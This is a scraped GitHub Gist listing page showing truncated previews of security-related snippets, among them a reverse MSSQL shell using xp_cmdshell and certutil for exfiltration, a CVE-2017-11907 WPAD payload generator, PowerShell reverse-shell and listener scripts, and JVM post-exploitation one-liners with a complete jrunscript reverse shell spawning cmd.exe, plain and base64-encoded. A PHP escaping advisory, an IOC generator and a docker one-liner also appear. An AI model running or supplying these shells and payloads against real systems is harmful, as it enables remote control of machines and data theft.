Skip to content

Instantly share code, notes, and snippets.

I may be slow to respond.


I may be slow to respond.
View GitHub Profile
MSAdministrator /
Last active May 7, 2021
Iranian APT Groups & Possible Commands Used By These Groups


The following content is generated using a preview release of Swimlane's pyattck.

This snippet of data is scoped to the following actor groups:

  • APT33
  • APT34
  • APT39
  • Charming Kitten
xassiz /
Created Mar 16, 2018
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
jthuraisamy /
Last active Sep 25, 2019
CVE-2017-11907 WPAD.dat Generator for Responder


This script generates a payload for use with Responder.

  1. Generate a payload with
  2. Copy and paste the one-liner output into the WPADScript field of Responder.conf.
test@test:~$ python3 --help
usage: [-h] [-o OUT] cmd
staaldraad / receivefile.ps1
Created Feb 24, 2017
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 8080```
View receivefile.ps1
$socket = new-object System.Net.Sockets.TcpListener('', 1080);
if($socket -eq $null){
exit 1;
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
msuiche / ioc-generator.ps1
Created Jan 13, 2017
PowerShell IOCs generator
View ioc-generator.ps1
dir . | Foreach-Object{
$file = $_
$hash = Get-FileHash $file -Algorithm MD5
$fileinfo = Get-Item $file
New-Object -TypeName PSObject -Property @{
VersionInfo = $fileinfo.VersionInfo
LastWriteTime = $fileinfo.LastWriteTime
Length = $fileinfo.Length
Algorithm = $hash.Algorithm
Zenexer /
Last active Mar 15, 2021
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure

Paul Buonopane at NamePros

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.


staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$read = $null;
staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('', 413);
if($socket -eq $null){
exit 1
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
frohoff /
Last active Aug 14, 2020
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
evanscottgray /
Last active May 9, 2021
kill all docker containers at once...
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt